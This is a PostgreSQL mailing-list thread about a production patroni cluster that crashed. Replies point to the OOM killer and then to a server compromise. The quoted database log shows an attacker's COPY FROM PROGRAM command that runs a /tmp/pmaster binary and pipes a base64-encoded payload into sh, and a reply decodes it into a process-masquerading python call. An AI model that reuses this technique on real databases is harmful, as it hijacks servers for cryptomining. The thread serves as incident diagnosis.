Обсуждение: Postgresql db crash and recovery mode
Hello all,
One of our production database crashed and got FATAL: the database system is in recovery mode. You can find OS version and db version info below. This is a patroni cluster, and we are using rsync command on archive command parameter you can also find db logs and messages logs when the events occured.
One of our production database crashed and got FATAL: the database system is in recovery mode. You can find OS version and db version info below. This is a patroni cluster, and we are using rsync command on archive command parameter you can also find db logs and messages logs when the events occured.
We could not understand why db crashed, could you guide us?
OS version: Red Hat Enterprise Linux Server release 7.9 (Maipo) (3.10.0-1160.36.2.el7.x86_64)
Postgresql db version: PostgreSQL 12.6 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
/var/log/messages output:
Oct 5 17:01:08 server01 abrt-hook-ccpp: Process 167619 (rsync) of user 26 killed by signal 3 - ignoring (unsupported signal)
db log:
2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856) was terminated by signal 9: Killed
2021-10-05 17:01:08.103 +03 20248 DETAIL: Failed process was running: COPY temp FROM PROGRAM 'chmod +x /tmp/pmaster; timeout 10; echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTEx
L2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg== | base64 -d | sh &' (ENCODING 'LATIN1');
2021-10-05 17:01:08.103 +03 20248 LOG: terminating any other active server processes
OS version: Red Hat Enterprise Linux Server release 7.9 (Maipo) (3.10.0-1160.36.2.el7.x86_64)
Postgresql db version: PostgreSQL 12.6 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-44), 64-bit
/var/log/messages output:
Oct 5 17:01:08 server01 abrt-hook-ccpp: Process 167619 (rsync) of user 26 killed by signal 3 - ignoring (unsupported signal)
db log:
2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856) was terminated by signal 9: Killed
2021-10-05 17:01:08.103 +03 20248 DETAIL: Failed process was running: COPY temp FROM PROGRAM 'chmod +x /tmp/pmaster; timeout 10; echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTEx
L2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg== | base64 -d | sh &' (ENCODING 'LATIN1');
2021-10-05 17:01:08.103 +03 20248 LOG: terminating any other active server processes
Regards.
=?UTF-8?B?TGF0aWYgZ8O8ZMO8aw==?= <latifguduk@gmail.com> writes: > One of our production database crashed and got FATAL: the database system > is in recovery mode. You can find OS version and db version info below. > 2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856) > was terminated by signal 9: Killed That is an external kill. If you didn't do it manually, it's most likely the Linux OOM killer in action. See https://www.postgresql.org/docs/current/kernel-resources.html#LINUX-MEMORY-OVERCOMMIT regards, tom lane
On Tue, Oct 5, 2021 at 10:58 PM Tom Lane <tgl@sss.pgh.pa.us> wrote: > > =?UTF-8?B?TGF0aWYgZ8O8ZMO8aw==?= <latifguduk@gmail.com> writes: > > One of our production database crashed and got FATAL: the database system > > is in recovery mode. You can find OS version and db version info below. > > > 2021-10-05 17:01:08.103 +03 20248 LOG: server process (PID 158856) > > was terminated by signal 9: Killed > > That is an external kill. If you didn't do it manually, it's most likely > the Linux OOM killer in action. The really worrying part is that it looks like your server has been compromised and you should do something about it, unless you want to keep mining bitcoins for strangers (or worse). I'm assuming that you're trying to start postgres using obfuscation in COPY command: $ echo cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTExL2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg== | base64 -d python -c 'import subprocess; proc = subprocess.Popen(["/usr/pgsql-11/bin/postgres"], executable="/tmp/pmaster").wait()'